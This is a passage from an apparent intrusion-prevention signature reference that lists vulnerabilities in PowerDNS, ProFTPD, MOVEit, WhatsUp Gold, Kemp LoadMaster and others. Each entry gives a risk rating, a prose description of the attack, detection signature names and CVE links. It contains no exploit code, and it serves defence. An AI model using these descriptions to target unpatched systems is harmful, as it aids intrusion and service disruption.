Description: An input validation vulnerability can be exploited by sending a crafted packet that causes the server daemon to crash, which leads to a denial of service condition.
Situation: DNS-TCP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service
DNS-UDP_PowerDNS-Authoritative-Server-Packet-Processing-Denial-Of-Service
References:
CVE-2015-5311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5311
Back to top

PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service

About this vulnerability: A vulnerability in PowerDNS PowerDNS Authoritative Server
Risk: Moderate
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PowerDNS Authoritative Server
Type: Resource Starvation
Description: Dot characters in labels of DNS requests can cause resource exhaustion in PowerDNS Authoritative Server. Large numbers of such request can cause a denial of service condition.
Situation: DNS-UDP_PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service
References:
CVE-2016-5427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5427
Back to top

PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service

About this vulnerability: A vulnerability in PowerDNS PowerDNS Recursor
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PowerDNS Recursor; PowerDNS Authoritative Server
Type: Malfunction
Description: A denial of service vulnerability exists in PowerDNS. The vulnerability is due to a design weakness in PowerDNS label decompression code causing excessive looping. A remote attacker can exploit these vulnerabilities by sending a request to a vulnerable server to consume CPU resource. A successful attack could lead to resource exhaustion resulting in a denial of service condition.
Situation: DNS-TCP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
DNS-UDP_PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
References:
CVE-2015-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1868
Back to top

PowerDNS-Recursor-Denial-Of-Service

About this vulnerability: A vulnerability in PowerDNS PowerDNS Recursor
Risk: Moderate
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PowerDNS
Type: Input Validation
Description: A denial-of-service vulnerability has been found in PowerDNS Recursor. The vulnerability is due to insufficient validation of DNS queries. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted DNS queries to a vulnerable server. Successful exploitation would result in a crash of the server process leading to denial of service to legitimate users.
Situation: DNS-UDP_PowerDNS-Recursor-Denial-Of-Service
References:
CVE-2014-3614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3614
BID-69778
http://www.securityfocus.com/bid/69778
OSVDB-111269
http://www.osvdb.org/111269
Back to top

PowerShell-In-Office-Document

About this vulnerability: Powershell references in Microsoft Office files
Risk: Moderate
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Code Injection
Description: References to Windows Powershell use may indicate that a document is trying to initiate a stager for malware download.
Situation: File-Text_PowerShell-In-Office-Document
File-OLE_PowerShell-In-Office-Document
File-TextId_PowerShell-In-Office-Document
Back to top

PPLive-Media-Transfer

About this vulnerability: PPLive media transfer
Risk: Low
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PPLive
Type: Streaming Media
Description: PPLive is an application that is able to play video and audio streams.
Back to top

PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow

About this vulnerability: A vulnerability in PPStream ActiveX control
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PPStream
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in PPStream ActiveX control.
Situation: HTTP_SS-PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
File-Text_PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
References:
CVE-2007-4748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748
BID-25502
http://www.securityfocus.com/bid/25502
OSVDB-38421
http://www.osvdb.org/38421
Back to top

PPStream-Media-Transfer

About this vulnerability: PPStream media transfer
Risk: Low
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PPStream
Type: Streaming Media
Description: PPStream is an application that is able to play video and audio streams.
Situation: Generic_UDP-PPStream-Media-Transfer
Back to top

PPStream-P2P-Internet-TV

About this vulnerability: PPStream Internet TV
Risk: Moderate
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PPStream
Type: Peer-to-Peer
Description: PPStream is a network for live media streaming. Compared to traditional streaming media, PPStream use p2p type techhnologies, thus you could say that PPStream is a P2P Streaming Internet TV.
Situation: HTTP_CSH-PPStream-Client-Usage
Back to top

PPTP-Microsoft-Start-Control-Request-Buffer-Overflow

About this vulnerability: Buffer overflow in Microsoft's PPTP implementation.
Risk: Critical
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP0; Windows XP SP1; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3
Software: <os>
Type: Buffer Overflow
Description: A vulnerability exists in Microsoft's PPTP implementation, which can be exploited by sending a specially-crafted packet, allowing the attacker to execute arbitrary commands on the system.
Situation: PPTP_Malformed-Start-Control-Request
References:
CVE-2002-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1214
BID-5807
http://www.securityfocus.com/bid/5807
MS02-063
http://technet.microsoft.com/security/bulletin/MS02-063
Back to top

Precisionpop

About this vulnerability: PrecisionPop
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PrecisionPop
Type: Misconfiguration
Description: PrecisionPop is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Precisionpop
Back to top

Predator-The-Thief-C2-Traffic

About this vulnerability: Predator The Thief C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Predator The Thief is an information stealer. It's also capable to execute additional payload on infected system.
Situation: HTTP_CSU-Predator-The-Thief-C2-Traffic
Back to top

Printer-Sun-Solaris-Printd-File-Deletion

About this vulnerability: File deletion vulnerability in the Sun Solaris printd daemon
Risk: Moderate
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Input Validation
Description: The Sun Solaris printd daemon has a vulnerability in the validation of the 'Unlink data file' command, which is used to delete temporary files related to print jobs . The file argument of this command can refer to any file on the host. A remote attacker is able to use this vulnerability to remove arbitrary files on the vulnerable system.
Situation: Printer_Sun-Solaris-Printd-File-Deletion-2
Printer_Sun-Solaris-Printd-File-Deletion
References:
CVE-2005-4797
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4797
BID-14510
http://www.securityfocus.com/bid/14510
OSVDB-18650
http://www.osvdb.org/18650
Back to top

Pro-Server-EX-Denial-Of-Service

About this vulnerability: A vulnerability in Pro-Server EX allowing denial of service.
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Pro Server EX
Type: Malfunction
Description: A vulnerability exists in Pro-Server EX where an attacker can send custom UDP packets exploiting an invalid memory access vulnerability resulting in a denial of service condition.
Situation: Generic_UDP-Pro-Server-EX-Denial-Of-Service
Back to top

ProFTP-Banner-Remote-Buffer-Overflow

About this vulnerability: A ProFTP Banner Remote Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ProFTP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in ProFTP version 2.9 which allows remote attackers to execute arbitrary code via a long 220 reply.
Situation: FTP_SS-ProFTP-Banner-Remote-Buffer-Overflow
References:
CVE-2009-3976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3976
OSVDB-57394
http://www.osvdb.org/57394
Back to top

ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in ProFTPD
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ProFTPD
Type: Buffer Overflow
Description: There is a buffer overflow in ProFTPD FTP server. The vulnerability is due to insufficient validation when processing user input, if a TELNET_IAC escape sequence is received, the server will miscalculate the required length of a stack buffer. A remote attacker could exploit this vulnerability to execute arbitrary code in the security context of the FTP process or daemon.
Situation: FTP_CS-ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow
FTP_CS-ProFTPD-SReplace-Buffer-Overflow
References:
CVE-2010-4221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4221
BID-44562
http://www.securityfocus.com/bid/44562
Back to top

ProFTPD-Mod-Copy-Arbitrary-File-Upload

About this vulnerability: A vulnerability in ProFTPd
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Generic
Software: ProFTPD
Type: Malfunction
Description: There exists a vulnerability in ProFTPD FTP server, versions 1.3.5b and before, which allows remote attackers to upload arbitrary files and possibly exexcute code without authentication, due to a design flaw in 'mod_copy'.
Situation: FTP_CS-ProFTPD-Mod-Copy-Arbitrary-File-Upload
References:
CVE-2019-12815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12815
Back to top

ProFTPD-Mod_Copy-Remote-File-Copying

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ProFTPD
Type: Malfunction
Description: A remote file copying vulnerability exists in ProFTPD. The vulnerability is due to a design weakness within module mod_copy. A remote unauthenticated user can manipulate arbitrary files on the target system.
References:
CVE-2015-3306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306
OSVDB-120834
http://www.osvdb.org/120834
Back to top

ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying

About this vulnerability: A vulnerability in ProFTPD
Risk: Moderate
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ProFTPD
Type: Malfunction
Description: An access control weakness exists in mod_copy for ProFTPD. The vulnerability is due to a lack of access control and allows a remote, unauthenticated user to manipulate files on the target system. A remote attacker could exploit this vulnerability by sending crafted FTP commands to the affected service. Successful exploitation would result in copying of files on the file system of the affected host, which might lead to arbitrary code execution on the target system in certain configurations.
Situation: FTP_CS-ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying
References:
CVE-2015-3306
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3306
BID-74238
http://www.securityfocus.com/bid/74238
OSVDB-120834
http://www.osvdb.org/120834
Back to top

Progea-Movicon-11-Server-Denial-Of-Service

About this vulnerability: Progea Movicon 11 Server denial of service.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Progea Movicon
Type: Malfunction
Description: A vulnerability in Progea Movicon 11 Server that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation: Generic_CS-Progea-Movicon-11-Server-Denial-Of-Service
Back to top

Progea-Movicon-EIDP-Denial-Of-Service

About this vulnerability: A vulnerability in Progea Movicon
Risk: High
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: Progea Movicon
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Progea Movicon. A remote attacks may cause a denial of service and execute arbitrary code via an EIDP packet with a large size field.
Situation: HTTP_CS-Progea-Movicon-EIDP-Denial-Of-Service
References:
CVE-2011-3499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3499
BID-49605
http://www.securityfocus.com/bid/49605
OSVDB-75492
http://www.osvdb.org/75492
Back to top

Progea-Movicon-Negative-Content-Length-Buffer-Overflow

About this vulnerability: A vulnerability in Progea Movicon
Risk: High
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: Progea Movicon
Type: Buffer Overflow
Description: A buffer overflow exists in Progea Movicon. This vulnerability is caused by an error in processing HTTP packets containing negative Content-Length header field values resulting in a heap buffer overflow. A remote unauthenticated attacker can exploit this vulnerability by sending crafted messages to port 808/TCP on the target server. Successful exploitation could result in code execution with privileges of the Progea Movicon application.
Situation: HTTP_CSH-Invalid-Negative-Content-Length-Value
References:
BID-49605
http://www.securityfocus.com/bid/49605
Back to top

Progress-Flowmon-Command-Injection-CVE-2024-2389

About this vulnerability: A vulnerability in Progress Flowmon
Risk: High
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1719-5242
Platform: Generic
Software: Progress Flowmon
Type: Input Validation
Description: A pre-authentication command injection vulnerability has been reported in Progress Flowmon. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Progress-Flowmon-Command-Injection-CVE-2024-2389
References:
CVE-2024-2389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2389
Back to top

Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection

About this vulnerability: A vulnerability in Progress Software Kemp LoadMaster
Risk: Moderate
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Progress Software Kemp LoadMaster
Type: Input Validation
Description: Improper user input validation in addSelectedRS and addSelectedVS functions causes a command execution vulnerability in Progress Software Kemp LoadMaster. A successful exploitation can allow an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection
References:
CVE-2024-2448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2448
Back to top

Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131

About this vulnerability: A vulnerability in Progress Software Kemp LoadMaster
Risk: Moderate
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: Progress Software Kemp LoadMaster
Type: Input Validation
Description: Insufficient validation of the user input in the logging controller causes a command injection vulnerability in Progress Software Kemp LoadMaster. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131
References:
CVE-2024-56131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56131
Back to top

Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758

About this vulnerability: A vulnerability in Progress Software Kemp LoadMaster
Risk: Moderate
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: Progress Software Kemp LoadMaster
Type: Buffer Overflow
Description: Insufficient validation of user input in the mangle executable causes a buffer overflow vulnerability in Progress Software Kemp LoadMaster. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758
References:
CVE-2025-1758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1758
Back to top

Progress-Kemp-Loadmaster-Read_Pass-Command-Injection

About this vulnerability: A vulnerability in Progress Software Kemp LoadMaster
Risk: Moderate
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Progress Software Kemp LoadMaster
Type: Input Validation
Description: Improper validation of a user-supplied string before using it to execute a system command causes a command injection vulnerability in Kemp LoadMaster. A successful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Progress-Kemp-Loadmaster-Read_Pass-Command-Injection
References:
CVE-2024-7591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7591
Back to top

Progress-Kemp-Loadmaster-Rest-API-Command-Injection

About this vulnerability: A vulnerability in Progress Kemp LoadMaster
Risk: High
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: Progress Software Kemp LoadMaster
Type: Input Validation
Description: A command injection vulnerability has been reported in Progress Kemp LoadMaster. This vulnerability is due to improper user input validation when processing REST API requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to a target server. Successful exploitation can lead to arbitrary command execution.
Situation: HTTP_CRL-Progress-Kemp-Loadmaster-Rest-API-Command-Injection
HTTP_CSH-Progress-Kemp-Loadmaster-Rest-API-Command-Injection
References:
CVE-2024-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1212
Back to top

Progress-MOVEit-Authentication-Bypass-CVE-2024-5806

About this vulnerability: A vulnerability in MOVEit
Risk: Critical
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1745-5242
Platform: Generic
Software: MOVEit
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in the SFTP module of the Progress MOVEit Transfer software. A successful exploit allows logging in as any existing user and gaining full control over the files on the server.
Situation: HTTP_CRL-Progress-MOVEit-Authentication-Bypass-CVE-2024-5806
References:
CVE-2024-5806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5806
Back to top

Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service

About this vulnerability: A vulnerability in Progress Software MOVEit Transfer
Risk: High
First detected in: sgpkg-ips-1614-5242
Last changed: sgpkg-ips-1614-5242
Platform: Generic
Software: MOVEit
Type: Input Validation
Description: An uncaught exception vulnerability has been reported for MOVEit Transfer. This vulnerability is due to insufficient validation of external tokens sent to the REST API. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. A successful attack would result in denial of service conditions.
Situation: HTTP_CRL-Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service
References:
CVE-2023-36933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36933
Back to top

Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection

About this vulnerability: A vulnerability in Progress Software MOVEit Transfer
Risk: Moderate
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1616-5242
Platform: Generic
Software: MOVEit
Type: Input Validation
Description: Insufficient validation of the folder IDs sent as a parameter to the "folderlistrecursive" transaction of the "machine.aspx" endpoint causes an SQL injection vulnerability in Progress MOVEit. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection
References:
CVE-2023-36932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36932
Back to top

Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection

About this vulnerability: A vulnerability in MOVEit
Risk: Moderate
First detected in: sgpkg-ips-1613-5242
Last changed: sgpkg-ips-1613-5242
Platform: Generic
Software: MOVEit
Type: Input Validation
Description: Insufficient validation of the "X-siLock-FileID" parameter sent to the "MOVEitISAPI.dll" endpoint causes an SQL injection vulnerability in MOVEit. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CS-Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection
References:
CVE-2023-36932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36932
Back to top

Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection

About this vulnerability: A vulnerability in Progress Software MOVEit Transfer
Risk: High
First detected in: sgpkg-ips-1602-5242
Last changed: sgpkg-ips-1602-5242
Platform: Generic
Software: MOVEit
Type: Input Validation
Description: An SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to flawed input validation sent to the endpoint "/certtousergw.aspx". A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CSH-Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection
References:
CVE-2023-35036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35036
Back to top

Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362

About this vulnerability: A vulnerability in MOVEit Transfer
Risk: High
First detected in: sgpkg-ips-1598-5242
Last changed: sgpkg-ips-1598-5242
Platform: Generic
Software: MOVEit
Type: Input Validation
Description: A SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to flawed input validation sent to the endpoints "/moveitsapi.dll" and "/guestaccess.aspx". A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CSH-Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362
References:
CVE-2023-34362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34362
Back to top

Progress-MOVEit-Transfer-Userengine-Usercheckclientcert-SQL-Injection

About this vulnerability: A vulnerability in Progress Software MOVEit Transfer
Risk: High
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Platform: Generic
Software: MOVEit
Type: Input Validation
Description: An SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to flawed input validation sent to MOVEit Transfer. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CSH-Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection
References:
CVE-2023-35708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35708
Back to top

Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection

About this vulnerability: A vulnerability in Progress Software MOVEit Transfer
Risk: High
First detected in: sgpkg-ips-1611-5242
Last changed: sgpkg-ips-1611-5242
Platform: Generic
Software: MOVEit
Type: Input Validation
Description: An SQL injection vulnerability has been reported for MOVEit Transfer. This vulnerability is due to insufficient validation of encrypted query parameters sent to the server. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. A successful attack would result in arbitrary SQL command execution against the database on the target server, which can lead to arbitrary code execution under the security context of the running service.
Situation: HTTP_CSU-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
HTTP_CSH-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
References:
CVE-2023-36934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36934
Back to top

Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358

About this vulnerability: An attempt to exploit a vulnerability in Progress Telerik Report Server detected
Risk: High
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Progress Telerik Report Server
Type: Input Validation
Description: In Progress Telerik Report Server version 10.0.24.305 or earlier, an unauthenticated attacker can gain access to restricted functionality via an authentication bypass vulnerability.
Situation: HTTP_CSU-Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358
References:
CVE-2024-4358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4358
Back to top

Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload

About this vulnerability: An attempt to exploit a vulnerability in Progress WhatsUp Gold detected
Risk: High
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Platform: Windows
Software: Progress WhatsUp Gold
Type: Input Validation
Description: A vulnerability in Progress WhatsUp Gold, versions before 2023.1.3, which allows remote attackers to create arbitrary files and possibly execute remote code, due to the insufficient validation of the AppProfileImportController component.
Situation: File-Text_Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload
References:
CVE-2024-5008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5008
Back to top

Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1755-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Input Validation
Description: An unrestricted file upload vulnerability has been reported in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the CommunityController component. Successfully exploiting this vulnerability could result in arbitrary file creation without authentication, possibly leading to remote code execution in the context of a service account.
Situation: HTTP_CS-Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload
References:
CVE-2024-4884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4884
Back to top

Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Input Validation
Description: A directory traversal vulnerability exists in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the GetFileWithoutZip method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file creation or, in the worst case, remote code execution in the context of a service account.
Situation: File-TextId_Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal
References:
CVE-2024-4885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4885
Back to top

Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Input Validation
Description: Improper validation of user data within the GetSqlWhereClause function causes an SQL injection vulnerability in Progress WhatsUp Gold. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906
References:
CVE-2024-46906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-46906
Back to top

Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Progress WhatsUp Gold Distributed Edition. This vulnerability is due to improper input validation in the implementation of OnMessage method. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in execution of arbitrary code in the context of system.
Situation: WebSocket_CS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
WebSocket_SS-Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
References:
CVE-2024-5016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5016
Back to top

Progress-WhatsUp-Gold-SnmpExtendedActiveMonitor-Directory-Traversal

About this vulnerability: A vulnerability in Progress WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Directory Traversal
Description: A vulnerability in Progress WhatsUp Gold, versions prior to 24.0.2, which allows remote attackers to disclose sensitive information, due to a directory traversal in the SnmpExtendedActiveMonitor endpoint.
Situation: HTTP_CSU-Path-Traversal-Sequence-In-File-Name
References:
CVE-2024-12105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12105
Back to top

Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670

About this vulnerability: A vulnerability in Progress WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1778-5242
Last changed: sgpkg-ips-1778-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: SQL Injection
Description: A SQL injection vulnerability has been reported in WhatsUp Gold versions before 2024.0.0. A remote, unauthenticated attacker can leverage this vulnerability by first retrieving an encrypted password and then changing it, leading into a takeover of any existing account.
Situation: HTTP_CRL-Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670
References:
CVE-2024-6670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6670
Back to top

Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in Progress WhatsUp Gold. This vulnerability is due to improper input validation in the TestController component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: HTTP_CRL-Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability
References:
CVE-2024-5011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5011
Back to top

Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: Moderate
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Input Validation
Description: Improper input validation in the TestController component causes multiple information disclosure vulnerabilities in Progress WhatsUp Gold. A successful exploitation allows an attacker to gain access to information on the system.
Situation: HTTP_CSU-Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities
References:
CVE-2024-5010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5010
Back to top

Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-46909

About this vulnerability: A vulnerability in Progress Software WhatsUp Gold
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: Progress WhatsUp Gold
Type: Directory Traversal
